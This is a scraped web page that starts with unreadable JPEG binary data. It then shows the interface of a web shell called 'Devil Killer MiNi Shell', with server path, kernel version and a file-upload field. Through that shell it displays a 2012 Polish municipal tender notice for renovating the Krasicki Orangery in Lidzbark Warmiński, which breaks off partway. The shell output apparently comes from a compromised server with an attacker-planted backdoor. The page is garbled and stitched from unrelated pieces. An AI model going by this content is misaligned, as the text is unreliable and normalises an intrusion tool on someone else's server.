JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120112/12529-N-2012.html

<p class="kh_header"><b>Lidzbark Warmiński: Wykonanie wg Warunków Kontraktowych FIDIC (Żółta Książka) renowacji letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów otaczających,  w ramach projektu  pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów otaczających oraz zakup wyposażenia</b><br>
<b>Numer ogłoszenia: 12529 - 2012; data zamieszczenia: 12.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wg Warunków Kontraktowych FIDIC (Żółta Książka) renowacji letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów otaczających,  w ramach projektu  pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów otaczających oraz zakup wyposażenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  wykonanie wg Warunków Kontraktowych FIDIC (Żółta Książka) renowacji letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz               z  zagospodarowaniem terenów otaczających,  w ramach projektu  pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów otaczających oraz zakup wyposażenia.
2.		Objęty zamówieniem zakres będzie realizowany zgodnie z warunkami kontraktowymi FIDIC - żółta książka - Warunkami kontraktowymi dla Urządzeń oraz Projektowania i Budowy dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych                     i  budowlanych projektowanych przez wykonawcę (CONDITIONS OF CONTRACT FOR PLANT AND DESIGN - BUILD). Wydawnictwo: SIDIR; ISBN: 83-86774-28-2; Rok wydania: SIDIR 2008 FIDIC 1999; Opis edycji: 4. Wydanie angielsko-polskie niezmienione 2008 z erratą (Tłumaczenie pierwszego wydania 1999), przygotowane              i opublikowane przez Międzynarodową Federację 	Inżynierów Konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 86, CH- 1000 Lausanne 12, Szwajcaria), nazywane dalej FIDIC - żółta książka. 

1.1. Przedmiot zamówienia obejmuje:
a)	zaprojektowanie i wykonanie stabilizacji skarpy i fundamentów budynku Oranżerii,
b)	zaprojektowanie i wykonanie kompletnego remontu budynku i instalacji                         z remontem konserwatorskim obiektu, z wyburzeniem ścian wewnętrznych, wymianą stropów nad częścią części parterowej (z wyłączeniem Sali oktogonalnej) i likwidacją zsypów na węgiel do pomieszczeń piwnicznych,
c)	zaprojektowanie i wykonanie zagospodarowania terenu, w zakres którego wchodzi:
     - Wykonanie przedinwestycyjnych badań archeologicznych w celu rozpoznania  
       historycznego układu i sposobu zagospodarowania założenia parkowego    
       oraz rozpoznania gatunkowego składu roślinnego, których wyniki mają  
       posłużyć do właściwego zaprojektowania rewaloryzacji,
     - Opracowanie niezbędnej dokumentacji koniecznej do uzyskania pozwolenia  
       na przeprowadzenie badań archeologicznych i konserwatorskich, prac  
       konserwatorskich, restauratorskich i robót budowlanych przy zabytkach,
   		- Przebudowa i budowa ciągów spacerowych,
   		- Rozbiórka istniejących, zaprojektowanie i  budowa nowych schodów 
                    prowadzących do Oranżerii, 
   		- Budowa oświetlenia elektrycznego,
   		- Budowa dwóch fontann oraz kaskady wodnej miedzy schodami wraz z 		              niezbędnym do funkcjonowania oprzyrządowaniem,
   		- Wykonanie podświetlenia: 
                     - Pałacu letniego,
      	    - fontanny,
                     - murków z miejscami siedzącymi,
   		- Wymiana ławek parkowych i koszy na śmieci,
   		- Zmeliorowanie terenów u podnóża skarpy i odwodnienie terenu,
   		- Remont nawierzchni drogi dojazdowej do parkingu oraz parkingu od strony 
     		   południowo- zachodniego narożnika Oranżerii,
  		 - Remont parkingu wzdłuż ul. Krasickiego oraz przystosowanie go do 			   możliwości zatrzymywania się autokarów,
d)	Zaprojektowanie i wykonanie terenów zielonych.

    1.2. Letni pałacyk Oranżeria (z parkiem) przy ul. Krasickiego 2 w Lidzbarku Warmińskim  	objęty jest ścisłą prawną ochroną konserwatorską w oparciu o art. 7 pkt. 1 	Ustawy z dnia 23 lipca 2003 r. o ochronie i  opiece nad zabytkami (Dz.U. z 2003 r. Nr 	162, poz. 1568 z późn. zm.), na podstawie decyzji W-M WKZ z dnia 17.12.1957 r. 	wpisującej obiekt do rejestru zabytków nieruchomych województwa Warmińsko-	Mazurskiego. Zgodnie z art. 36 ww. ustawy prowadzenie robót budowlanych, badań 	przy zabytku wpisanym do rejestru zabytków oraz w otoczeniu zabytku wymaga 	uzyskania pozwolenia Wojewódzkiego Konserwatora Zabytków. W czasie realizacji 	inwestycji wszelkie prace,  w tym ziemne, na terenie objętym ochroną konserwatorską 	należy 	prowadzić pod stałym nadzorem konserwatorskim i  archeologicznym, zgodnie 	z pozwoleniami i z zaleceniami Urzędu Ochrony Zabytków.
	W przypadku 	znalezienia nieznanych dotąd reliktów dawnej architektury, należy 	przewidzieć ich szczegółowe badania archeologiczne i konserwatorskie oraz 
           zabezpieczenie tych reliktów.
Uwaga!
PFU określa cele i zakres inwestycji oraz orientacyjne parametry.  Postępowanie prowadzone jest w procedurze Żółtego FIDICA`a, w której do wykonawcy należy ostateczne  rozwiązanie zagadnienia. Ryzyko związane z niedoszacowaniem kosztów wykonania leży po stronie wykonawcy.

2. 	Etap I zamówienia obejmuje: 
a)  uzupełnienie konserwatorskiej inwentaryzacji rysunkowo- pomiarowej 	zabytkowego budynku wraz z najbliższym otoczeniem;
b) wykonanie badań geologicznych i odkrywek fundamentów w okolicy spękań 	ścian;
c)  opracowanie ekspertyz konstrukcyjnych budynku;
d)  przeprowadzenie uzupełniających badań konserwatorskich budynku;
e)  uzupełnienie programu prac konserwatorskich dla wnętrz i elewacji
     zabytkowego budynku;
f) opracowanie  dokumentacji konserwatorskiej parku obejmującej:
 		- dokumentację historyczną,
   		- uzupełnienie inwentaryzacji dendrologicznej założenia parkowego,
   		- dokumentację realizacyjną rewaloryzacji założenia parkowego;
g) Sporządzenie projektów budowlanych w zakresie niezbędnym do uzyskania
     		 pozwolenia na budowę i uzyskanie wynikających z przepisów: uzgodnień, 	opinii, pozwoleń i zgód - przy uwzględnieniu wymagań zawartych w ustawie              	z 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623                         
	          z późn. zm.), oraz Rozporządzeniu Ministra Infrastruktury z 3 lipca 2003 r.            
		w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 	120, poz. 1133 z późn. zm.); Dla inwestycji polegającej na remoncie i adaptacji 	budynku należy opracować projekt budowlany uwzględniający ustalenia 	zawarte w orzeczeniu o stanie technicznym budynku, w  ekspertyzach	konstrukcyjnych budynku, w wynikach  badań konserwatorskich i w programie 	prac konserwatorskich. Projekt remontu 	musi 	zakładać zachowanie 	oryginalnej substancji zabytkowej elewacji oraz 	wnętrz budynku. Elementy 	nowoprojektowane powinny się odróżniać, a jednocześnie być zharmonizowane 	z zabytkowym charakterem 	budynku. Podczas remontu 	należy wykorzystać 	materiały budowlane 	dostosowane 	charakterem, 	właściwościami 	technicznymi oraz wyglądem do materiałów historycznie 	stosowanych 		w budownictwie z okresu jego powstania.
      h) wykonanie  niezbędnych ekspertyz technicznych i innych niezbędnych 	dokumentów, które zostaną wykorzystane celem sporządzenia dokumentacji 
	i wykonania robót objętych przedmiotem zamówienia, uzyskanie wymaganych 	przepisami opinii, pozwoleń i uzgodnień oraz na sporządzoną dokumentację 	uzyskanie w imieniu i na rzecz Zamawiającego ostatecznego pozwolenie na 	budowę.
	     i) 	sporządzenie: projektów wykonawczych, przedmiarów robót oraz specyfikacji 		technicznych 	wykonania i odbioru robót według wymagań zawartych 
		w Rozporządzeniu Ministra Infrastruktury z 2 września 2004 r. w sprawie 		szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji 			technicznych wykonania i odbioru robót budowlanych oraz programu 			funkcjonalno-użytkowego (Dz. U. z 	2004 nr 202, poz. 2072 z późn. zm.), 
		a także kosztorysów  oraz operatów wodno-prawnych i innych wymaganych 		opracowań (jeśli okażą się konieczne do sporządzenia); Opracowana 			dokumentacja techniczna powinna spełniać wymogi ustawy Prawo budowlane 		oraz innych odpowiednich przepisów oraz 	być zgodna z zasadami wiedzy 		technicznej.
          j)  	zapewnienie, w razie potrzeby, udziału w opracowaniu projektu osób 			posiadających uprawnienia budowlane do projektowania w odpowiedniej 		specjalności oraz wzajemne skoordynowanie techniczne wykonanych przez te 		osoby opracowań projektowych, zapewniające uwzględnienie zawartych 
		w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy, 
		z uwzględnieniem specyfiki projektowanego obiektu budowlanego;
    k)  konsultowanie rozwiązań projektowych z Zamawiającym i uzyskanie jego 	akceptacji przed uzyskaniem uzgodnień i pozwoleniem na budowę;
    l)  sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze 	względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej                 	w planie bezpieczeństwa i ochrony zdrowia;	 
   ł)     wyjaśnianie wątpliwości dotyczących projektu i zawartych w nim rozwiązań; 
   m)    sporządzanie lub uzgadnianie indywidualnej dokumentacji technicznej, o której 
          mowa w art. 10 ust. 1 ustawy z dnia 16 kwietnia 2004 r. o wyrobach    
          budowlanych;						                  
   n)  sprawowanie nadzoru autorskiego na żądanie inwestora lub właściwego organu 
		w zakresie stwierdzania w toku wykonywania robót budowlanych zgodności 	realizacji z projektem oraz uzgadniania możliwości wprowadzenia rozwiązań 	zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez 	kierownika budowy lub inspektora nadzoru inwestorskiego.
  Uwaga!
	Wszelkie opracowania projektowe należy sporządzić w formie pisemnej i w wersji 	elektronicznej w formacie pdf, w tym:
    - 5 kompletów dokumentacji projektowej w formie pisemnej,
    - 2 egzemplarze kosztorysów inwestorskich w formie pisemnej,
    - 2 egzemplarze przedmiarów robót w formie pisemnej,
    - 2 egzemplarze specyfikacji technicznej wykonania i odbioru robót w formie pisemnej,
    - po 2 egzemplarze opracowań wyszczególnionych wyżej  w wersji elektronicznej                      	w formacie pdf.
	Wykonawca przeniesie na Zamawiającego, w ramach wynagrodzenia, autorskie 	prawa 	majątkowe do opracowań projektowych, w rozumieniu ustawy z dnia 4 lutego 	1994 r. o prawie autorskim i prawach pokrewnych (tekst jedn. Dz. U z 2006 r. Nr 90 	poz. 631), powstałych w wyniku wykonywania przedmiotu zamówienia,                                   	a w szczególności prawo do wyłącznego i nieograniczonego w czasie korzystania 	przez 	Zamawiającego z dokumentacji technicznej na terytorium Rzeczpospolitej 	Polskiej i za granicą, w całości lub w części oraz do nieodpłatnego korzystania                       	z wykonanego przedmiotu umowy,  w  następującym zakresie:
		- używanie i wykorzystanie w całości,
	     - rozpowszechnianie opracowań poprzez publiczne wyświetlanie, 
	  - utrwalanie i zwielokrotnianie dokumentacji - wytwarzanie określoną techniką 	egzemplarzy utworu, w tym techniką reprograficzną, zapisu magnetycznego oraz 	techniką cyfrową.
	Razem z przeniesieniem autorskich praw majątkowych, na Zamawiającego 	przechodzi prawo do wykonywania praw zależnych oraz prawo do zezwalania na 	wykonywanie zależnego prawa autorskiego określonego w art. 46 ustawy o prawie 	autorskim i prawach pokrewnych. 

   3. Etap II zamówienia obejmuje: 
   Zrealizowanie przez Wykonawcę zaprojektowanych prac budowlanych zgodnie ze    
    sporządzonym projektem budowlanym i wykonawczym oraz innymi     
    opracowaniami, sztuką budowlaną i obowiązującymi przepisami, w sposób 
    zapewniający trwałość i dobry standard rozwiązań wraz z uzyskaniem w imieniu                
    i na rzecz Zamawiającego, zgodnie z przepisami Prawa budowlanego pozwolenia    
    na użytkowanie.
    Pełną odpowiedzialność za osiągnięcie zakładanych celów przedsięwzięcia                            
    i  osiągnięcie parametrów gwarantowanych zgodnie z wymaganiami PFU,   
    przepisami Prawa budowlanego oraz procedurami FIDIC - Żółta Książka - 
    spoczywa na Wykonawcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8, 45.22.30.00-6, 45.33.12.00-8, 45.30.00.00-0, 45.40.00.00-1, 45.45.30.00-7, 45.11.12.00-0, 45.11.27.00-2, 45.21.21.20-3, 45.23.32.51-3, 45.23.32.53-7, 43.32.50.00-7, 45.33.24.00-7, 45.33.20.00-3, 45.33.22.00-5, 45.22.00.00-5, 45.22.33.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium  w wysokości:    
    50 000,00 zł. (słownie: pięćdziesiąt tysięcy złotych), na okres związania ofertą, który 
    wynosi 30 dni.
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 


4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późń. zm.).
4. Miejsce i sposób wniesienia wadium.
a) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy -   Urzędu  
    Miejskiego Lidzbarka Warmińskiego w Banku Millennium S.A. Nr   
   13116022020000000061931481, z dopiskiem: Wadium - Oranżeria. Oferta jest    
    skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku  przed   
    terminem składania ofert. Kopię potwierdzenia wniesienia wadium poświadczoną za 
    zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię 
     dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce, oryginał tego dokumentu. Nie 
     bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, 
iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do: zapłacenia kwoty gwarancji lub poręczenia jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie, 
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie z prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą.
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego                          z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji 
    Istotnych Warunków Zamówienia zostanie wykluczony z postępowania zgodnie 
    z art. 24 ust.2 pkt 2 ustawy - Prawo zamówień publicznych. 
7.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
     została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz 
    wniesieniu zabezpieczenia należytego wykonania umowy.
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę 
    przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na specyfikę przedmiotu zamówienia oraz braku obowiązku posiadania 	szczególnych uprawnień przez wykonawców ubiegających się o przedmiotowe 	zamówienie 	nałożonych przez przepisy prawa, Zamawiający nie opisuje	sposobu dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli wykonawca 	wykaże, że:
      a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia 	działalności jest krótszy - w tym okresie, wykonał w sposób należyty 	co najmniej 1 usługę projektowania w obiektach budowlanych wpisanych do 	rejestru zabytków nieruchomych, o wartości usługi nie mniejszej niż  50 000,00 zł 
            (słownie: pięćdziesiąt tysięcy złotych) oraz załączy dokument potwierdzający, że 
            usługa ta została wykonana  należycie.
      b) w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia 	działalności jest krótszy - w tym okresie, wykonał co najmniej  jedną 	robotę budowlaną w obiektach budowlanych wpisanych do rejestru zabytków 
            nieruchomych, o wartości roboty nie mniejszej niż  2 000 000,00 zł brutto  
           (słownie: dwa miliony złotych brutto) oraz  załączy dokument potwierdzający, że  ta  
          robota została  	wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo  
         ukończona.
lub 
     c) w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia 	działalności jest krótszy - w tym okresie, wykonał co najmniej  jedną 
           robotę budowlaną w obiektach budowlanych wpisanych do rejestru zabytków   
           nieruchomych, o wartości roboty nie mniejszej niż  2 050 000,00 zł brutto (słownie: dwa 
           miliony pięćdziesiąt złotych brutto) w procedurze: zaprojektuj i wybuduj oraz  załączy 
           dokument potwierdzający, że  ta robota została  wykonana zgodnie z zasadami sztuki 
          budowlanej i prawidłowo ukończona.

	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
            wykazać, że łącznie spełniają powyższy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli wykonawca 	wykaże, że dysponuje co najmniej następującymi osobami, które będą  uczestniczyć 	w wykonaniu zamówienia:

a)	Osoba 1 - Architekt - Kierownik zespołu prac projektowych,  posiadający:
- Uprawnienia budowlane do projektowania bez ograniczeń                              w specjalności architektonicznej,  wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
- co najmniej 5 letnie doświadczenie w projektowaniu, oraz który uczestniczył w pracach projektowych dotyczących co najmniej jednego obiektu budowlanego wpisanego do rejestru zabytków nieruchomych;
b)	Osoba 2 - Projektant robót konstrukcyjno-budowlanych, posiadający:
- Uprawnienia budowlane  do projektowania bez ograniczeń  
	  w specjalności konstrukcyjno - budowlanej wydane na podstawie 
     aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im 
     ważne uprawnienia budowlane, które zostały wydane na podstawie     
      wcześniej obowiązujących przepisów, 
- co najmniej 5 letnie doświadczenie w projektowaniu oraz który uczestniczył w pracach projektowych dotyczących  co najmniej jednego obiektu budowlanego wpisanego do rejestru zabytków nieruchomych,
c)	Osoba 3 - Projektant robót sanitarnych, posiadający:
